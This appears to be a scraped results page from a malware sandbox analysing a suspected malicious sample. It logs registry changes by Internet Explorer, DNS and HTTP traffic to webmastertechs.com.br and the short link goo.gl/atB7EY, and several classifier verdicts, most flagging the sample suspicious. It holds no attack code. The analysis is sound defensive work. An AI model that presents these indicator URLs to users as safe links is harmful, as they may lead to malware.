11/3/2020 - 11:45:48.418Delete2488C:\Program Files (x86)\Internet Explorer\iexplore.exe\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates75E0ABB6138512271C04F85FDDDE38E4B7242EFE
11/3/2020 - 11:45:48.418Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exe\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\75E0ABB6138512271C04F85FDDDE38E4B7242EFEBlob
11/3/2020 - 11:45:53.903Delete1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Internet Explorer\Recovery\AdminActive{00000000-0000-0000-0000-000000000000}
11/3/2020 - 11:45:53.903Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Internet Explorer\EUPP Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\DSPBackupDefaultSearchScope
11/3/2020 - 11:45:53.903Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Internet Explorer\User Preferences88D7D0879DAB32E14DE5B3A805A34F98AFF34F5977
11/3/2020 - 11:45:53.903Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Internet Explorer\SearchScopesDefaultScope
11/3/2020 - 11:45:53.903Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Internet Explorer\EUPP Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\DSPChangeNotice
11/3/2020 - 11:45:53.903Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Internet Explorer\User Preferences2D53CFFC5C1A3DD2E97B7979AC2A92BD59BC839E81

File Summary
Created
Identified: True check_circle

Deleted
Identified: True check_circle

Process Summary
Created
Identified: True check_circle

Deleted
Identified: True check_circle

Registry Summary
Proxy
Identified: False cancel

AutoRun
Identified: False cancel

Created
Identified: True check_circle

Deleted
Identified: True check_circle

Browsers
Identified: True check_circle

Internet
Identified: True check_circle

Loading...

DNS
Query
computer localhost arrow_forward computer gateway:DNS code go.microsoft.com.
computer localhost arrow_forward computer gateway:49222 code www.bing.com.
computer localhost arrow_forward computer gateway:51595 code api.bing.com.
computer localhost arrow_forward computer gateway:58036 code www.bing.com.
computer localhost arrow_forward computer gateway:DNS code webmastertechs.com.br.
computer localhost arrow_forward computer gateway:DNS code goo.gl.
computer localhost arrow_forward computer gateway:50273 code go.microsoft.com.
computer localhost arrow_forward computer gateway:54285 code www.bing.com.
computer localhost arrow_forward computer gateway:49551 code api.bing.com.
computer localhost arrow_forward computer gateway:50043 code ocsp.pki.goog.
computer localhost arrow_forward computer gateway:DNS code ocsp.pki.goog.
computer localhost arrow_forward computer gateway:59829 code webmastertechs.com.br.
computer localhost arrow_forward computer gateway:DNS code www.bing.com.
computer localhost arrow_forward computer gateway:DNS code api.bing.com.
computer localhost arrow_forward computer gateway:56655 code www.bing.com.

Response
computer gateway:DNS arrow_forward computer localhost code go.microsoft.com. reply_all 104.104.169.209

computer gateway:DNS arrow_forward computer localhost code goo.gl. reply_all 172.217.28.78

computer gateway:DNS arrow_forward computer localhost code www.bing.com. reply_all 204.79.197.200

computer gateway:DNS arrow_forward computer localhost code www.bing.com. reply_all 13.107.21.200

computer gateway:DNS arrow_forward computer localhost code api.bing.com. reply_all 13.107.46.80

computer gateway:DNS arrow_forward computer localhost code ocsp.pki.goog. reply_all 172.217.172.195


TCP
Info
172.217.28.78:443 arrow_forward computer localhost:65193
172.217.172.195:80 arrow_forward computer localhost:65194
computer localhost:65191 arrow_forward 172.217.28.78:80
172.217.28.78:80 arrow_forward computer localhost:65192
computer localhost:65194 arrow_forward 172.217.172.195:80
172.217.28.78:80 arrow_forward computer localhost:65191
computer localhost:65192 arrow_forward 172.217.28.78:80
computer localhost:65193 arrow_forward 172.217.28.78:443

UDP
Info
computer localhost:58036 arrow_forward computer localhost:53
computer localhost:53 arrow_forward computer localhost:50273
computer localhost:49222 arrow_forward computer localhost:53
computer localhost:53 arrow_forward computer localhost:56655
computer localhost:49551 arrow_forward computer localhost:53
computer localhost:53 arrow_forward computer localhost:54285
computer localhost:53 arrow_forward computer localhost:50043
computer localhost:53 arrow_forward computer localhost:58036
computer localhost:53 arrow_forward computer localhost:55394
computer localhost:59829 arrow_forward computer localhost:53
computer localhost:55394 arrow_forward computer localhost:53
computer localhost:53 arrow_forward computer localhost:49222
computer localhost:53 arrow_forward computer localhost:51595
computer localhost:56655 arrow_forward computer localhost:53
computer localhost:50043 arrow_forward computer localhost:53
computer localhost:68 arrow_forward help_outline 255.255.255.255:67
computer localhost:67 arrow_forward computer localhost:68
computer localhost:51595 arrow_forward computer localhost:53
computer localhost:53 arrow_forward computer localhost:59829
computer localhost:53 arrow_forward computer localhost:49551
computer localhost:50273 arrow_forward computer localhost:53
computer localhost:54285 arrow_forward computer localhost:53

HTTP
Info
computer localhost send GET goo.gl attach_file /atB7EY
computer localhost send GET ocsp.pki.goog attach_file /gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjtJqhjYqpgSVpULg%3D
computer localhost send GET ocsp.pki.goog attach_file /gts1o1/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRCRjDCJxnb3nDwj%2Fxz5aZfZjgXvAQUmNH4bhDrz5vsYJ8YkBug630J%2FSsCEQCuvwBRDDb68AgAAAAAMM4r

Summary
DNS
True check_circle

TCP
True check_circle

UDP
True check_circle

HTTP
True check_circle

Results
BINARY
KNN (K=3, NFS-BRMalware)
confidence: 100.00%
suspicious: True check_circle

Decision Tree (NFS-BRMalware)
confidence: 100.00%
suspicious: True check_circle

SVC (Kernel=Linear, NFS-BRMalware)
confidence: 98.32%
suspicious: False cancel

MalConv (Ember: Raw Bytes, Threshold=0.5)
confidence: 98.42%
suspicious: True check_circle

Random Forest (100 estimators, NFS-BRMalware)
confidence: 63.00%
suspicious: True check_circle

Non-Negative MalConv (Ember: Raw Bytes, Threshold=0.35)
confidence: 66.31%
suspicious: False cancel

LightGDM (Ember: File Characteristics, Threshold=0.8336)
confidence: 99.89%
suspicious: True check_circle

Add to Collection
Download